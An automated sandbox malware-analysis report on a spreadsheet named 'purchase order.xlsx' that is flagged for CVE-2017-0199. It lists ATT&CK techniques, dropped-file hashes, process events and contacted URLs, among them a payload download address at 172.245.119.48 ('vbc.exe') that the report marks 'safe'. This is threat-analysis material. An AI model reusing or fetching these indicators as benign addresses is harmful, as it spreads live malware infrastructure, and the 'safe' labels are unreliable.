        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
        Source: C:\Windows\SysWOW64\msdt.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the signature count the report shows for that technique)

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
        Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (12); At (Linux); At (Windows)
        Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
        Privilege Escalation: Process Injection (11); Extra Window Memory Injection (1); Logon Script (Windows); Logon Script (Mac)
        Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Process Injection (11); Extra Window Memory Injection (1)
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
        Discovery: Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13); System Network Configuration Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
        Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
        Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (21); Ingress Tool Transfer (11); Protocol Impersonation
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
        Impact: Modify System Partition; Device Lockout; Delete Device Data
        Source | Detection | Scanner | Label | Link
        purchase order.xlsx | 17% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199 |
        Source | Detection | Scanner | Label | Link
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll | 0% | Metadefender | |
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\DiagPackage.dll | 0% | ReversingLabs | |
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui | 0% | Metadefender | |
        C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://roaming.edog. | 0% | URL Reputation | safe |
        https://cdn.entity. | 0% | URL Reputation | safe |
        https://powerlift.acompli.net | 0% | URL Reputation | safe |
        https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
        https://cortana.ai | 0% | URL Reputation | safe |
        https://api.aadrm.com/ | 0% | URL Reputation | safe |
        https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe |
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe |
        http://172.245.119.48/870/vbc.exe | 0% | Avira URL Cloud | safe |
        https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
        https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
        https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe |
        https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
        https://api.aadrm.com | 0% | URL Reputation | safe |
        https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
        https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
        https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
        https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
        https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
        https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
        http://172.245.119.48/shipping_invc/document.html | 0% | Avira URL Cloud | safe |
        https://ncus.contentsync. | 0% | URL Reputation | safe |
        https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
        https://wus2.contentsync. | 0% | URL Reputation | safe |
        https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe |
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe |
        https://ncus.pagecontentsync. | 0% | URL Reputation | safe |
        No contacted domains info
        Name | Malicious | Antivirus Detection | Reputation
        http://172.245.119.48/870/vbc.exe | false | Avira URL Cloud: safe | unknown
        http://172.245.119.48/shipping_invc/document.html | false | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.diagnosticssdf.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://login.microsoftonline.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://shell.suite.office.com:1443 | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://autodiscover-s.outlook.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://roaming.edog. | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://cdn.entity. | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://api.addins.omex.office.net/appinfo/query | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://clients.config.office.net/user/v1.0/tenantassociationkey | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://powerlift.acompli.net | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://rpsticket.partnerservices.getmicrosoftkey.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://lookup.onenote.com/lookup/geolocation/v1 | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://cortana.ai | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://cloudfiles.onenote.com/upload.aspx | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://entitlement.diagnosticssdf.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.aadrm.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://ofcrecsvcapi-int.azurewebsites.net/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.microsoftstream.com/api/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://cr.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | Avira URL Cloud: safe | low
        https://portal.office.com/account/?ref=ClientMeControl | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://graph.ppe.windows.net | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://res.getmicrosoftkey.com/api/redemptionevents | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://powerlift-frontdesk.acompli.net | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://tasks.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://officeci.azurewebsites.net/api/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://store.office.cn/addinstemplate | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://api.aadrm.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://outlook.office.com/autosuggest/api/v1/init?cvid= | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://globaldisco.crm.dynamics.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://dev0-api.acompli.net/autodetect | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://www.odwebp.svc.ms | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://api.diagnosticssdf.office.com/v2/feedback | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.powerbi.com/v1.0/myorg/groups | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://web.microsoftstream.com/video/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.addins.store.officeppe.com/addinstemplate | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://graph.windows.net | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://dataservice.o365filtering.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://officesetup.getmicrosoftkey.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://analysis.windows.net/powerbi/api | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://prod-global-autodetect.acompli.net/autodetect | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://outlook.office365.com/autodiscover/autodiscover.json | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://ncus.contentsync. | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        http://weather.service.msn.com/data.aspx | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://apis.live.net/v5.0/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://messaging.lifecycle.office.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://management.azure.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://outlook.office365.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://wus2.contentsync. | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://incidents.diagnostics.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://clients.config.office.net/user/v1.0/ios | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://insertmedia.bing.office.net/odc/insertmedia | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://o365auditrealtimeingestion.manage.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://outlook.office365.com/api/v1.0/me/Activities | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.office.net | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://incidents.diagnosticssdf.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://asgsmsproxyapi.azurewebsites.net/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://clients.config.office.net/user/v1.0/android/policies | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://entitlement.diagnostics.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://substrate.office.com/search/api/v2/init | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://outlook.office.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://storage.live.com/clientlogs/uploadlocation | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://outlook.office365.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://webshell.suite.office.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://substrate.office.com/search/api/v1/SearchHistory | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://management.azure.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://messaging.lifecycle.office.com/getcustommessage16 | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://clients.config.office.net/c2r/v1.0/InteractiveInstallation | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://login.windows.net/common/oauth2/authorize | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | URL Reputation: safe | unknown
        https://graph.windows.net/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://api.powerbi.com/beta/myorg/imports | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://devnull.onenote.com | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | | high
        https://messaging.action.office.com/ | 34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.dr | false | |
                                                                                                                                                    high
                                                                                                                                                    https://ncus.pagecontentsync.34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://messaging.office.com/34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile34C7A8FE-4DF9-41DA-97CE-FBD957286E8B.0.drfalse
                                                                                                                                                          high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.245.119.48 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | false
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 653502
Start date and time: 2022-06-28 10:43:18 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 9s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: purchase order.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.expl.winXLSX@10/24@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.76.34, 52.109.88.37, 20.54.89.106, 52.242.101.226, 52.152.110.14, 20.223.24.244
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: purchase order.xlsx
No simulations
No context
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 149126
Entropy (8bit): 5.356744655596469
Encrypted: false
SSDEEP: 1536:6cQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvidkXx5ETLKz6e:FJQ9DQC+zcXwI
MD5: 6FF92A7CC58B007B5CF50798752F5FF6
SHA1: B1500193F727C0943683A97216E28A9CEB39E45F
SHA-256: 3BA0725357DE15FE94FA3B623E1C08191CEFF322EB8EC431404F306F15D8B7F4
SHA-512: 0E67CE141AD773AB8C7D15AED840FE3DEB50D67DAF2AEE2B372CF46D309CB7BC3686076B8B167C0BB10DC569B58893F556F169430EA2A2C8F403596912415911
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-28T08:44:30">.. Build: 16.0.15420.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 130 x 187, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 16424
Entropy (8bit): 7.9810223666914055
Encrypted: false
SSDEEP: 384:rGO9ao+FvCVT/82OoZJh+5thcR6zPOkCpVP9o+axwZFl+v:6Olyc8cNpVlKoW
MD5: 86212DE909C5057FF80D28C6BCDA1B97
SHA1: 7B4846994D2A926D32AE44464802C8862D0D89AD
SHA-256: B796FFD015039600D93F191B42361B22A940F84BAADA5E4E7A9BD62829458BD0
SHA-512: DE7F37E3BF5A8E07BB5E323EA9A767CEE3856925DA332A4858C5D44A1B9635D9660BFE809BE6F6A8CCCB4EA3CD578CBE395A7B25AC30A89476353B898A585F4B
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 344
Entropy (8bit): 2.446884075910387
Encrypted: false
SSDEEP: 6:YDRX/5OQHzqEkNslqg6lnW6kK0XgtjuYVz2tYVzfvt8J:Y1ROo6ClqgOnVp0NYVxVjw
MD5: 00022229E61960C6F67FEA5ABD7CC7BF
SHA1: 95550373818BBB679D2388324C94A949CFFF90D5
SHA-256: CA521CE8E4A2C824905F74E45089E94D008E3E346439ECB9146AAD551C609A0F
SHA-512: CE17174A7CD5F6063151FF025F50C2DB959421A529B45358750C6722E10FBD1E073970AD1809D03E86BF58AA9752EEA286907EF53630321D50146EA6FEBDF8F4
Malicious: false
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: Windows Enhanced Metafile (EMF) image data version 0x10000
Category: dropped
Size (bytes): 498420
Entropy (8bit): 0.641121533751757
Encrypted: false
SSDEEP: 384:jXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:DXwBkNWZ3cjvmWa+VDO
MD5: B6B2AE798B3758B49D802640BD39AF32
SHA1: 656AC44B76A94412C192609FBE730B73B238C3A9
SHA-256: 6E281E82686640834CECC8BAECB83C1AEB68114A45299115D5B590E7C51E9332
SHA-512: 375A29D725F6FD007BEE3C126165635DC89D16CAAB1FB0D5AD5AA87A1332E51EB55153D6216A954EA77E3B2DA11C35DAB2D428AAB7014B9813035964090F7DE8
Malicious: false
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: data
Category: downloaded
Size (bytes): 21741
Entropy (8bit): 6.426960150522073
Encrypted: false
SSDEEP: 384:+z357eNbjcN0gKdG9iSrvx/oBqEq7LFGgsdHmYGvx:+pedjcP915/8nq7LFGndHOx
MD5: CDF5BDD4111E8CD5F0349DAFA4FD69D6
SHA1: 93FBE5D73A10E5C80593BB765203B05642C38574
SHA-256: 59AA679DE09E68BC33D33371FEEF67837410E0056C10A9D66D87F01F667DD006
SHA-512: 7400E6CA2B650D0451EE923E2C0F036DEA165EE008BF1E50FECDD282794CF0F31975D4ED854E0440F314318C0E5AF99D0E5E048BBA636E3062D691B0101DB299
Malicious: false
IE Cache URL: http://172.245.119.48/shipping_invc/document.html
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3584
Entropy (8bit):3.09405754705922
Encrypted:false
SSDEEP:24:etGSBm9pz1qlkCe745Q7GslPorPjvX5ekjV4gztkZfPy6Iv+SnOBWI+ycuZhNSGX:6Upqb927GslPIDRjyJP0Ok1ul7a3Xq
MD5:9AECF9FCAD18AD5C87157D7A648B6BD4
SHA1:C30F06A3A49A0F52ECC64FF544159AB46E09B084
SHA-256:884C79B3C442E367C47C28CE379460E8EC0849D4C4D6381657794F40B2A7CB67
SHA-512:CE0425D8EC6E3104A8E02DDD1A40D8B22F27CF600BF2D730AA29C904C6C619B2667784ECD66FFB8B9FC717C19293AC0D4877D3D0B0AFAC15A772E7C7A5683E74
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.11907740507641
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grykGak7YnqqlXPN5Dlq5J:+RI+ycuZhNSGakSlXPNnqX
MD5:85E307F916985ED8227C37FD6EAAD243
SHA1:72F137CA124C6E97E4546458E2F076B75A2927DE
SHA-256:23C6B12E792794E645586D3E40359BDE672C6618968B96A525030C4D3F36F414
SHA-512:1C1D539D6631373D01238A80142B253EAEA39740955EE8E8B452645D69BFCA25D99CBEC10BE44D0A2DC4BFD52EFE5A972CEEA467CC385C0929410CB46D5CC307
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.1027541743460825
Encrypted:false
SSDEEP:24:H4C9A++fCXXOODfHNhKYDfII+ycuZhNSGakSlXPNnq9Wd:ixCXXO07K2g1ul7a3Xq9m
MD5:8FEBD54D47AB795291C00E5A653BE4F6
SHA1:F1223492FCCFFDF42690645083E72AEE47618D18
SHA-256:0B69D1611DEA610CBDE2B25572D75CC2749E05EB36ECAD7E5D33A3BB5772896A
SHA-512:9B634837EA9FD829CFE4BEE2EDE06C706E85787058241CDCA11BF66DC4D6BAE10CCD96CD5591EB165D590A7E1A0C3A32E0A97A92D4522C0FD677C609317BD986
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.114314965892433
Encrypted:false
SSDEEP:24:H6gC9AWZfEGTFw0DfHWFhKYDfII+ycuZhNnakSJPNnq9Wd:fWBZTFwy2zK2g1ulna3rq9m
MD5:8F7E3DC0BAFE313F5CD4C9AF8D658E10
SHA1:4B3A6AEE81EE79CED7D9B6A13A52407D67AC4C9D
SHA-256:4F3476B8E205E0B0908EBD5F50CBFA9776823AECC322FBE2F33366252BCC429A
SHA-512:CD52EAB587B8F33B85E5458CE4DD1FA8455F43C1DE14E6C896161D095551FDB74C313BDE226E35D5ACCDE2AC8132B62214DFCFA16F0650D10BBB8311F341BE89
Malicious:false
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.095959176124916
Encrypted:false
